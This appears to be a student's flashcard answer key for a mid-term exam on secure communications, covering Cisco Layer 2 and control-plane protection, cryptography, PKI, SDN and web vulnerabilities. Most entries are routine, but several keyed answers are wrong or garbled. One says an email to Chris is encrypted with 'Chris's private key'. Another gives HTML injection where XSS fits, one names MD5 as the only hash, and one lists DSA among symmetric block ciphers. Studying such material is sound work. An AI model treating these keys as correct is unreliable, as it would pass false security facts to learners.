Mid-Term Secure Communication (Chapter 1 - 6)
all of these answers are correct
1. Which of the following are different STP port states? Root port Designated Nondesignated All of these answers are correct.
Parser views (or "views")
1. You have been asked to restrict users without having to create custom privilege levels. Which of the following features or functionality would you deploy to accomplish this task? Parser views (or "views") AAA profiles DAI All of these answers are correct.
Layer 2
10. CDP operates at _________ and may provide attackers information we would rather not disclose. Layer 2 Layer 3 Layer 4 Layer 7
Cisco Resilient Configuration
10. Which of the following is a feature that's intended to improve recovery time by making a secure working copy of a router or switch image and the startup configuration files (which are referred to as the primary bootset) so that they cannot be deleted by a remote user? Cisco Resilient Configuration Cisco Secure Firmware Configuration Address Space Layout Randomization (ASLR) None of these answers is correct.
IPv6 Destination Guard
11. If an attacker attempts to spoof many IPv6 destinations in a short time, the router can get overwhelmed while trying to store temporary cache entries for each destination. The ______________feature blocks data traffic from an unknown source and filters IPv6 traffic based on the destination address. It populates all active destinations into the IPv6 first-hop security binding table, and it blocks data traffic when the destination is not identified. IPv6 Destination Guard IPv6 Neighbor Cache Guard IPv6 Hop-by-hop Extension Header IPv6 Neighbor Cache Resource Starvation
Routing protocols all support a different set of cryptographic algorithms. BGP supports only HMAC-SHA1-12. *BGP supports only HMAC-MD5 and HMAC-SHA1-12.
12. BGP keychains enable keychain authentication between two BGP peers. The BGP endpoints must both comply with a keychain on one router and a password on the other router. Which of the following statements is not true regarding BGP keychains? BGP is able to use the keychain feature to implement hitless key rollover for authentication. Key rollover specification is time based, and in the event of clock skew between the peers, the rollover process is impacted. The configurable tolerance specification allows for the accept window to be extended (before and after) by that margin. This accept window facilitates a hitless key rollover for applications (for example, routing and management protocols). Routing protocols all support a different set of cryptographic algorithms. BGP supports only HMAC-SHA1-12.
RBAC
2. The concept of _____________ is to create a set of permissions or limited access and assign that set of permissions to users or groups. Those permissions are used by individuals for their given roles, such as a role of administrator, a role of a help desk person, and so on. ABAC RBAC Dynamic groups Downloadable ACLs
All of these answers are correct.
2. Which of the following are Layer 2 best practices? Avoid using VLAN 1 anywhere, because it is a default. Administratively configure access ports as access ports so that users cannot negotiate a trunk and disable the negotiation of trunking (no Dynamic Trunking Protocol [DTP]). Turn off Cisco Discovery Protocol (CDP) on ports facing untrusted or unknown networks that do not require CDP for anything positive. (CDP operates at Layer 2 and may provide attackers information we would rather not disclose.) On a new switch, shut down all ports and assign them to a VLAN that is not used for anything else other than a parking lot. Then bring up the ports and assign correct VLANs as the ports are allocated and needed. All of these answers are correct.
Management plane, control plane, data plane
3. The Network Foundation Protection (NFP) framework is broken down into which of the following three basic planes (also called sections/areas)? Controller plane, administrative plane, management plane Management plane, control plane, administrative plane Management plane, control plane, data plane None of these answers is correct.
Dynamic ARP Inspection (DAI)
3. Which feature can protect against Address Resolution Protocol (ARP) spoofing, ARP poisoning (which is advertising incorrect IP-to-MAC-address mapping information), and resulting Layer 2 man-in-the-middle attacks? DHCP spoofing Dynamic ARP Inspection (DAI) IP Source Guard All of these answers are correct.
All of these answers are correct.
4. Which of the following are best practices for securing the management plane? Enforce password policy, including features such as maximum number of login attempts and minimum password length. Implement role-based access control (RBAC). Use AAA services, and centrally manage those services on an authentication server (such as Cisco ISE). Keep accurate time across all network devices using secure Network Time Protocol (NTP). All of these answers are correct.
CPPr is not applied to a physical interface, so regardless of the logical or physical interface on which the packets arrive, the router processor can still be protected.
4. Which of the following statements is not true? CoPP is applied to a logical control plane interface (not directly to any Layer 3 interface) so that the policy can be applied globally to the router. The benefit of CPPr is that you can rate-limit and filter this type of traffic with a more fine-toothed comb than CoPP. The host sub-interface that handles traffic to one of the physical or logical interfaces of the router is one of the sub-interfaces of CPPr. CPPr is not applied to a physical interface, so regardless of the logical or physical interface on which the packets arrive, the router processor can still be protected.
All of these answers are correct.
5. DHCP snooping is a security feature that acts like a firewall between untrusted hosts and trusted DHCP servers. Which of the following are activities performed by DHCP snooping? Validates DHCP messages received from untrusted sources and filters out invalid messages. Rate-limits DHCP traffic from trusted and untrusted sources. Builds and maintains the DHCP snooping binding database, which contains information about untrusted hosts with leased IP addresses. Utilizes the DHCP snooping binding database to validate subsequent requests from untrusted hosts. All of these answers are correct.
Routing protocol authentication is not a best practice for securing the control plane; it is a best practice to protect the management plane.
5. Which of the following statements is not true? Control Plane Protection, or CPPr, allows for a more detailed classification of traffic (more than CoPP) that is going to use the CPU for handling. The benefit of CPPr is that you can rate-limit and filter this type of traffic with a more fine-toothed comb than CoPP. Using CoPP or CPPr, you can specify which types of management traffic are acceptable at which levels. For example, you could decide and configure the router to believe that SSH is acceptable at 100 packets per second, syslog is acceptable at 200 packets per second, and so on. Routing protocol authentication is not a best practice for securing the control plane; it is a best practice to protect the management plane.
Use TCP Intercept and firewall services to reduce the risk of SYN-flood attacks.
6. You were hired to help increase the security of a new company that just deployed network devices in two locations. You are tasked to deploy best practices to protect the data plane. Which of the following techniques and features should you consider deploying to protect the data plane? (Select all that apply.) Use TCP Intercept and firewall services to reduce the risk of SYN-flood attacks. Filter (deny) packets trying to enter your network (from the outside) that claim to have a source IP address that is from your internal network. Deploy CoPP and CPPr in firewalls and IPS systems, as well as routing protocol authentication. Configure NetFlow and NETCONF for Control Plane Protection.
Root Guard
6. Your switch might be connected to other switches that you do not manage. If you want to prevent your local switch from learning about a new root switch through one of its local ports, you can configure which of the following features? Dynamic Root Inspection Root Guard DHCP Guard Port Security A and C
All of these answers are correct.
7. Which of the following are best practices to protect the management plane and management traffic? Deploy Login Password Retry Lockout to lock out a local AAA user account after a configured number of unsuccessful attempts by the user to log in using the username that corresponds to the AAA user account. Enable role-based access control (RBAC). Use NTP to synchronize the clocks on network devices so that any logging that includes timestamps may be easily correlated. Preferably, use NTP Version 3 to leverage its ability to provide authentication for time updates. All of these answers are correct.
Dynamic ARP Inspection
7. Which of the following prevents spoofing of Layer 2 information by hosts? Dynamic ARP Inspection BPDU Guard Root Guard All of these answers are correct.
service timestamps log datetime
8. Which of the following commands enable timestamps in syslog messages? service syslog timestamps log datetime logging timestamps log datetime service timestamps log datetime None of these answers is correct.
IP Source Guard
8. Which of the following prevents spoofing of Layer 3 information by hosts? Dynamic ARP Inspection BPDU Guard IP Source Guard All of these answers are correct.
Storm Control
9. Which of the following limits the amount of broadcast or multicast traffic flowing through the switch? Root Guard BPDU Guard Storm Control DHCP snooping
Enable NTP
9. You were hired to configure all networking devices (routers, switches, firewalls, and so on) to generate syslog messages to a security information and event management (SIEM) system. Which of the following is recommended that you do on each of the infrastructure devices to make sure that the SIEM is able to correctly correlate all syslog messages ? Enable OSPF. Configure the network infrastructure devices to send syslog messages in batches (at a scheduled interval). Configure the SIEM to process the syslog messages at a scheduled interval. Enable NTP
YANG model
A YANG-based server publishes a set of YANG modules, which taken together from the system's _______________. YANG model NETCONF model RESTCONF model gRPC model
Vulnerability
A ___________ is a weakness in the system design, implementation, software, or code, or the lack of a mechanism. Vulnerability Threat Exploit None of these answers are correct.
Availability
A denial-of-service attack impacts which of the following? Integrity Availability Confidentiality None of these answers is correct.
Integrity
An attacker is able to manipulate the configuration of a router by stealing the administrator credential. This attack impacts which of the following? Integrity Session keys Encryption None of these answers is correct.
Implicit deny Need to know
An authorization policy should always implement which of the following concepts? (Select all that apply.) Implicit deny Need to know Access control debugging logs Access control filter logs
Chris's private key
Assume that Mike is trying to send an encrypted email to Chris using PGP or S/MIME. What key will Mike use to encrypt the email to Chris? Chris's private key Chris's public key Mike's private key Mike's public key
D. nonegotiate
Fill in the blank for the following command to disable the ability to negotiate, even though the port is hard coded as a trunk: SW2(config-if)# switchport _____ A. disable negotiate B. negotiate-disable C. negotiate-off D. nonegotiate
All of these answers are correct.
Most digital certificates contain which of the following information? Serial number Signature Thumbprint (fingerprint) All of these answers are correct.
XML
NETCONF messages are encoded in a(n) _______________ structure defined by the NETCONF standard. JSON XML OWASP RESTCNF
A hypervisor
NFV nodes such as virtual routers and firewalls need which of the following components as an underlying infrastructure? A hypervisor A virtual forwarder to connect individual instances A network controller All of the answer are correct.
All of these answers are correct.
SQL injection attacks can be divided into which of the following categories? Blind SQL injection Out-of-band SQL injection In-band SQL injection None of these answers is correct. All of these answers are correct.
PSIRT (Product Security Incident Response Teams)
Software and hardware vendors may have separate teams that handle the investigation, resolution, and disclosure of security vulnerabilities in their products and services. Typically, these teams are called ________. CSIRT Coordination Center PSIRT MSSP
All of these answers are correct
The RESTCONF interface is built around a small number of standardized requests. Which of the following are requests supported by RESTCONF? GET PUT PATCH All of these answers are correct
root
The switch port that is closest to the root bridge in terms of STP path cost (that is, it receives the best BPDU on a switch) is considered the _____ port. root designated nondesignated altenative
All of these answers are correct.
There have been multiple IP tunneling mechanisms introduced throughout the years. Which of the following are examples of IP tunneling mechanisms? VXLAN SST NVGRE All of these answers are correct.
CVE (Common Vulnerabilities and Exposures) identifer.
Vulnerabilities are typically identified by a ___________.? CVE CVSS PSIRT None of these answers is correct.
POST
Which of the following HTTP methods sends data to the server typically used in HTML forms and API requests? POST GET TRACE PUT
A, B, and C
Which of the following are IoT technologies? Z-Wave INSTEON LoRaWAN A and B A, B, and C None of these answers is correct.
Authentication Nonrepudiation
Which of the following are benefits of digital signatures? Authentication Nonrepudiation Encryption Hashing
Substitution
Which of the following are examples of common methods used by ciphers? Transposition Substitution Polyalphabetic Polynomial
MD5
Which of the following are examples of hashes? ASH-160 SHA-1 SHA-2 MD5
All of these answers are correct.
Which of the following are examples of malware attack and propagation mechanisms? Master boot record infection File infector Macro infector All of these answers are correct.
All of these answers are correct.
Which of the following are examples of security mechanisms designed to preserve confidentiality? Logical and physical access controls Encryption Controlled traffic routing All of these answers are correct.
Advanced Encryption Standard (AES) Triple Digital Encryption Standard (3DES) DSA Blowfish
Which of the following are examples of symmetric block cipher algorithms? Advanced Encryption Standard (AES) Triple Digital Encryption Standard (3DES) DSA Blowfish ElGamal
PKCS #10 PKCS #12
Which of the following are public key standards? IPsec PKCS #10 PKCS #12 ISO33012 AES
All of these answers are correct. STIX (Structured Threat Information eXpression) TAXII (Trusted Automated eXchange of Indicator Information) CybOX (Cyber Observable eXpression) OpenIOC (Open Indicators of Compromise) OpenC2 (Open Command & Control)
Which of the following are standards being developed for disseminating threat intelligence information? STIX TAXII CybOX All of these answers are correct.
Base, temporal, and environmental groups
Which of the following are the three components in CVSS? Base, temporal, and environmental groups Base, temporary, and environmental groups Basic, temporal, and environmental groups Basic, temporary, and environmental groups
The management, control, and data planes
Which of the following are the three different "planes" in traditional networking? The management, control, and data planes The authorization, authentication, and accountability planes The authentication, control, and data planes None of these answers are correct.
All of these are correct
Which of the following can be used to retrieve a network device configuration? RESTCONF NETCONF SNMP All of these are correct
PaaS (Platform as a Service)
Which of the following cloud models include all phases of the system development life cycle (SDLC) and can use application programming interfaces (APIs), website portals, or gateway software? SaaS PaaS SDLC containers None of these answers is correct.
An authorization model
Which of the following defines how access rights and permission are granted? Examples of that model include object capability, security labels, and ACLs. A mandatory access control model An authorization model An authentication model An accounting model
Authentication by knowledge
Which of the following describes the type of authentication where the user provides a secret that is only known by him or her? Authentication by password Authentication by knowledge Personal identification number (PIN) code Authentication by characteristics
FQDN (Fully Qualified Domain Name) Public Key also IP address
Which of the following entities can be found inside of a digital certificate? FQDN DNS server IP address Default gateway Public key
All of these answers are correct.
Which of the following implementations uses a key pair? PGP Digital certificates on a web server running TLS S/MIME All of these answers are correct.
DevNet
Which of the following is a Cisco resource where you can learn about network programmability and obtain sample code? APIC ACI DevNet NETCONF
requests
Which of the following is a Python package that can be used to interact with REST API? argparse requests rest_api_pkg None of these answers are correct
All of these answers are correct.
Which of the following is a cloud deployment model? Public cloud Community cloud Private cloud All of these answers are correct.
NIST Cybersecurity Framework
Which of the following is a collection of industry standards and best practices to help organizations manage cybersecurity risks? MITRE NIST Cybersecurity Framework ISO Cybersecurity Framework CERT/cc
OTP (One Time Pad/Password)
Which of the following is a good example of a key that is only used once? OTP ISAKMP Multifactor key None of these answers are correct
Swagger
Which of the following is a modern framework of API documentation and is now the basis of the OpenAPI Specification (OAS)? SOAP REST Swagger WSDL
OWASP (Open Web Application Security Project)
Which of the following is a nonprofit organization that leads several industry-wide initiatives to promote the security of applications and software? CERT/cc OWASP AppSec FIRST
Exploit
Which of the following is a piece of software, a tool, a technique, or a process that takes advantage of a vulnerability that leads to access, privilege escalation, loss of integrity, or denial of service on a computer system? Exploit Reverse shell Searchsploit None of these answers is correct.
X.500
Which of the following is a series of standards focused on directory services and how those directories are organized? 802.1X X.500 X.11 X.409
One-time passcode (OTP)
Which of the following is a set of characteristics that can be used to prove a subject's identity one time and one time only? One-time passcode (OTP) Out-of-band (OOB) Biometrics None of these answers is correct.
ETA
Which of the following is a solution that allows yo to detect security threats in encrypted traffic without decrypting the packets? ETA ESA WSA None of these answers is correct.
Stream cipher (symmetric key)
Which of the following is a symmetric key cipher where the plaintext data to be encrypted is done a bit at a time against the bits of the key stream, also called a cipher digit stream? Asymmetric cipher Block cipher Stream cipher None of these answers is correct.
SOAP
Which of the following is a type of API that exclusively uses XML? APIC REST SOAP GraphQL
Symmetric (block cipher)
Which of the following is a type of cipher that uses the same key to encrypt and decrypt? Symmetric Asymmetric Ciphertext RSA
Community cloud
Which of the following is a type of cloud deployment model where the cloud environment is shared among different organizations? Community cloud IaaS PaaS None of these answers is correct.
HTML injection
Which of the following is a type of vulnerability where the flaw is in a web application but the attack is against an end user (client)? XXE HTML injection SQL injection XSS
All of these answers are correct.
Which of the following is a way for an attacker to perform a session hijack attack? Predicting session tokens Session sniffing Man-in-the-middle attack Man-in-the-browser attack All of these answers are correct.
Messages in the 200 range ranges Messages in the 100 range are informational. Messages in the 200 range are related to successful transactions. Messages in the 300 range are related to HTTP redirections. Messages in the 400 range are related to client errors.Messages in the 500 range are related to server errors.
Which of the following is an HTTP status code messages range related to successful HTTP transactions? Messages in the 100 range Messages in the 200 range Messages in the 400 range Messages in the 500 range
An incident
Which of the following is an adverse event that threatens business security and/or disrupts service? An incident An IPS alert A DLP alert A SIEM alert
Diffie-Hellman (DH / asymmetric)
Which of the following is an algorithm that allows two devices to negotiate and establish shared secret keying material (keys) over an untrusted network? Diffie-Hellman RSA RC4 IKE
Certificate Authority (CA)
Which of the following is an entity that creates and issues digital certificates? Certificate Registry (CR) Certificate Authentication Server (CAS) Certificate Authority (CA) None of these answers is correct.
All of these answers are correct.
Which of the following is an example of tools and methods to hack IoT devices? UART debuggers JTAG analyzers IDA Ghidra All of these answers are correct.
VXLAN Network Identifier (VNID)
Which of the following is an identifier or a tag that represents a logical segment? VXLAN Network Identifier (VNID) VXLAN Segment Identifier (VSID) ACI Network Identifier (ANID) Application Policy Infrastructure Controller (APIC)
Confiv
Which of the following is an open source project that allows yo to deploy micro-segmentation policy-based services in container environments? OVS Confiv ODL All of the above
SAML (Security Assertion Markup Language)
Which of the following is an open standard for exchanging authentication and authorization data between identity providers, and is used in many single sign-on (SSO) implementations? SAML OAuth 2.0 OpenConnectID DUO Security
East-west traffic
Which of the following is network traffic between servers (virtual servers or physical servers), containers, and so on? East-west traffic North-south traffic Micro-segmentation Network Overlays
802.1X
Which of the following is not a communications protocol used in IoT environments? Zigbee INSTEON LoRaWAN 802.1X
RSA (Rivest, Shamir, Adleman)
Which of the following is not an example of a symmetric encryption algorithm? AES 3DES RC4 RSA
Ret2Libc
Which of the following is not an example of ransomware? WannaCry Pyeta Nyeta Bad Rabbit Ret2Libc
Threat intelligence
Which of the following is referred to as the knowledge about an existing or emerging threat to assets, including networks and systems? Exploits Vulnerabilities Threat assessment Threat intelligence
Chain of custody
Which of the following is the way you document and preserve evidence from the time that you started the cyber-forensics investigation to the time the evidence is presented in court? Chain of custody Best evidence Faraday None of these answers is correct.
All of these answers are correct.
Which of the following is true about Cisco ACI? Spine node interconnect leaf devices, and they can be used to establish connection from Cisco ACI pod to an IP network or interconnect multiple Cisco ACI pods. Leaf switches provide the Virtual Extensible LAN (VXLAN) tunnel endpoint (VTEP) function. The APIC manages the distributed policy repository responsible for the definition and deployment of the policy-based configuration o the Cisco ACI infrastructure. All of these answers are correct.
all of these answers are correct
Which of the following is true about SDN? SDN provides number ours benefits in the area of management plane. These benefits are in both physical switches and virtual switches. SDN changed a few things in the management, control and data planes. However the big change was in the control and data planes software-based switches and router (including virtual switches inside of hypervisors). SDN is now widely adopted in data centers All of these answers are correct.
A root certificate contains the public key of the CA.
Which of the following is true about root certificates? A root certificate contains information about the user. A root certificate contains information about the network security device. A root certificate contains the public key of the CA. Root certificates never expire.
VXLAN
Which of the following is used to create network overlays? SDN-Lane VXLAN VXWAN None of these answers are correct
A key pair is a set of two keys that work in combination with each other as a team.
Which of the following statements are true about public and private key pairs? A key pair is a set of two keys that work in combination with each other as a team. A key pair is a set of two keys that work in isolation. If you use the public key to encrypt data using an asymmetric encryption algorithm, the corresponding private key is used to decrypt the data. If you use the public key to encrypt data using an asymmetric encryption algorithm, the peer decrypts the data with that public key.
Subordinate CA servers can be invalidated.
Which of the following statements is true? Subordinate CA servers can be invalidated. Subordinate certificates cannot be invalidated. Root certificates cannot be invalidated. Root CAs cannot be invalidated.
White hat
Which type of hacker is considered a good guy? White hat Black hat Gray hat All of these answers are correct.
The principle of least privilege and separation of duties
You were hired to configure AAA services in an organization and are asked to make sure that users in the engineering department do not have access to resources that are only meant for the finance department. What authorization principle addresses this scenario? The principle of least privilege and separation of duties Accounting and MAC Auth-bypass Deter, delay, and detect Policy-based segmentation
Threat
_________ is any potential danger to an asset. Vulnerability Threat Exploit None of these answers is correct.
Reflected DDoS
____________ attacks occur when the sources of the attack are sent spoofed packets that appear to be from the victim, and then the sources become unwitting participants in the DDoS attacks by sending the response traffic back to the intended victim. Reflected DDoS Direct DoS Backtrack DoS SYN flood
Root Certificate
a root certificate contains the public key of the CA server and other details about the CA server.
MD5
produces a 128-bit (16-byte) hash value, typically expressed in text format as a 32-digit hexadecimal number.
